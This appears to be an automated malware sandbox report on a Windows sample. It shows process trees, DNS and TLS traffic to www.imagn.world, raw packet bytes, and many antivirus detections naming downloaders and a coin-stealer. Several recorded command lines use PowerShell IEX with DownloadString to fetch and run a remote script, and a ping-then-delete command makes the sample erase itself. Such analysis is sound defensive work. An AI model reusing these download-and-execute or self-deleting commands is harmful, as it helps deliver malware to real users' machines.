Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 9, 2023, 9:52 a.m. | March 9, 2023, 10:03 a.m. |
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')"
2620-
powershell.exe powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')
2704
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL
2868-
PING.EXE ping 127.0.0.1
2936
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.216.159.81 |
www.imagn.world | 104.26.6.106 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49170 172.67.75.82:443 |
None | None | None |
TLSv1 192.168.56.101:49178 172.67.75.82:443 |
None | None | None |
TLSv1 192.168.56.101:49165 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49166 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49167 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49173 172.67.75.82:443 |
None | None | None |
TLSv1 192.168.56.101:49171 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49174 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49175 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49177 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49180 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49185 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49162 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49168 172.67.75.82:443 |
None | None | None |
TLSv1 192.168.56.101:49172 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49176 172.67.75.82:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.imagn.world | 42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c |
TLSv1 192.168.56.101:49179 172.67.75.82:443 |
None | None | None |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | .gfids |
resource name | AFX_DIALOG_LAYOUT |
resource name | None |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')" |
cmdline | C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL |
cmdline | powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1') |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')" |
cmdline | "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL |
file | C:\Users\test22\AppData\Local\Temp\sqlcmd.exe |
Data received | [ |
Data received | Wd /ýYθyº¶kÒ¤íÑHáS1DOWNGRD Knû´k¥.{»ÂôzD©rþ¼Àüª^%ÿ@À ÿ |
Data received | ¿ |
Data received | » ¸ 10-0 ½)øËè@wfðAü0 *H÷ 0210 UUS10U Let's Encrypt10 UR30 230114020524Z 230414020523Z010U *.imagn.world0"0 *H÷ 0 Þhgõ¿gy*|¦Õmk×Ý«{%jÄ-3 3²vogDx` ôHú®ý+ÂÚ_ ümÜ/uÁ¤íH]ôæ8rÖìxÁ_/&#Ï x¶÷&EاϾ¯]{!¬'ý$HLÈ?¦yWC³Jt¦ßQ¦j¬çª_Ó'+ëóXÆYCã%æÑTÏäúù'ßSdÓ>rÁ4 ×ÿúûÀê¦r¸¥Æ×?ÉƯcTÊô6ôÜég«ÁsRRD¤FLÃ<2S ²??Û`Ú<®c³Úßó¾är i渹ºÙIÇq £U0Q0Uÿ 0U%0++0Uÿ0 0U^7uE]/;¹,ÐîÙ_¹?0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0%U0 *.imagn.worldimagn.world0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyõò ð v z2TØ·-¶ ê8àRép2 M;Ò+Á:W£RëR ®=2 G0E ,C½\íçTAßòIBÂ)µåYe¿Ùê<¤5! ¯^.Õéä+Á[ǵéqÅÔMõ§bsÊo«'±9 v ·>û$ßMºuò9źXôl]üBÏz5Ä %í´ ®=2 G0E! ÷"Rìûâ%ä0Tªñ:*?umnbáÌÅ,VD; bÐÑÛÔwâÆù éF×üÐÄÙÆÉNb 0 *H÷ Ö_ýx1×D¤¬ñÐP"Xp>êsW_åô};D̼÷ÜÞÙØ a×#Âàæ²íõ= /ºîÛGoFo4¾iÞòÚ2äÀ¢Ã%ÓÈø¤9§u~èrEQ _òÒ_î`× <z7Õµ L}-YnåÔüÜβ¨ð5Ä ]))׳Ü0Õ¢êDèrĬ£¨õ̶)¬áµ¾ãôÛéÊ,:ö´þí(cuNáê.7+úW!W(UÅúå>ÿ쾿4¯ÌÕà-9zѵÕóû´ém¾èÅF?¤ñ 00þ +JϧSöÖ.%§_Z0 *H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 *H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH ¡i®%u»ÌRõíQ¡Û £00Uÿ0U%0++0Uÿ0ÿ 0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 *H÷ ÊNG>£÷ D ¼Õgx²cuM=3erT- êÃíø ¿_Ì·p ·n;ö^Þä ¦ï²ç¢µ<δí9ç|%Gæen?FôÙðÎ+îTμ'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'Ã*ȹÎ\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+*ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1u*CØUrÄ)÷Ä]NÈ®F0×ò _¡y»ç^páùÜaq%*¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S ]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎ UþéIdÔNÊ´[Às¨«¸G d0`0H @w!7ÔéB¸îvª<d ·0 *H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 *H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷u¢þõjnö O(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙJ?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´*ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$ɧZ£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)̺½¢A¡Öñ¶ð¨|;F¨H*Üvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO £F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0ħ±¤{,qúÛáKuÿÄ` 0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 *H÷ s lnÿRЮÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿N ïà ë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìã Þã8ú¤}±ØèI+èkO8w.ùÝç9 |
Data received | K |
Data received | G Aïgv,áÚ*- bdÐk¬%Gd Ë·lÊQ:ÉåõïÙÓeÒïxYØW9Ò¡)ÖmªjWâ uÏþÁ F`µ´¶fC¥ : áÄa¥vN Ó)§ãL6Ê f÷¶K¬VP~¢eVåsZ#ÂÝ¿ÍX7£Dz×Ì#(lc«bÞPu_DK`3 ºT%(Ī7ykOú¼§6 õOýNúï·â£ld°àk£ëpÊcæ S¬¸~Ý(v%êwÛéZâ ð8ýÖ12 ±@¨óâùÕæò[ëß+v`O\Tze¸4ò4É× Z ×;±¡NÁ^d{.m1$r'£è c=³¢Ç>ÁäLm.æÂuM\ |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | æÃ:Di½¯ºA»Lè?¾S°5CÚD};/ ¸T8/×Gjå¼Ê¡eiåþ |
Data sent | r nd -ó''jH¼'ÜFm·9:u÷_4àèG#¢ / 5 ÀÀÀ À 2 8 -ÿ www.imagn.world |
Data sent | F BAÆÇ!â'K´«@ªÀ5Ðh·q»ôFWÒËDTÙW[µ¤b^ÚI-#BµxõêÕÔ*Ü3á"öèÞ¿ 0êö#à&Fp: :«ø¬ì2LõN[åÕl©Ídç³²T{ $ áíüÜÓ. |
cmdline | C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL |
cmdline | ping 127.0.0.1 |
cmdline | "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
MicroWorld-eScan | Dropped:Generic.BAT.Downloader.D.6F6494F3 |
FireEye | Generic.mg.fc4462b1448b7db9 |
McAfee | Artemis!FC4462B1448B |
VIPRE | Dropped:Generic.BAT.Downloader.D.6F6494F3 |
Sangfor | Trojan.Win32.Save.a |
Alibaba | Trojan:Win32/Kryptik.3404d64a |
CrowdStrike | win/malicious_confidence_100% (W) |
Arcabit | Generic.BAT.Downloader.D.6F6494F3 |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
ESET-NOD32 | a variant of Win32/Kryptik.HROL |
Cynet | Malicious (score: 100) |
APEX | Malicious |
Kaspersky | HEUR:Trojan-PSW.Win32.Coins.gen |
BitDefender | Dropped:Generic.BAT.Downloader.D.6F6494F3 |
Avast | CrypterX-gen [Trj] |
Sophos | Generic ML PUA (PUA) |
McAfee-GW-Edition | BehavesLike.Win32.NetLoader.ch |
Emsisoft | Dropped:Generic.BAT.Downloader.D.6F6494F3 (B) |
Webroot | W32.Downloader.Gen |
MAX | malware (ai score=82) |
Gridinsoft | Ransom.Win32.Sabsik.sa |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
GData | Win32.Trojan-Downloader.Generic.L5MVQP |
AhnLab-V3 | Trojan/Win.PowershellDownloader.R561248 |
Acronis | suspicious |
BitDefenderTheta | Gen:NN.ZexaF.36308.myW@auLYVBdi |
ALYac | Dropped:Generic.BAT.Downloader.D.6F6494F3 |
VBA32 | suspected of Trojan.Downloader.gen |
Cylance | unsafe |
Rising | Trojan.Generic@AI.100 (RDML:Su5sB/wAsy01K5Ai3qViLg) |
Fortinet | W32/Kryptik.HROL!tr |
AVG | CrypterX-gen [Trj] |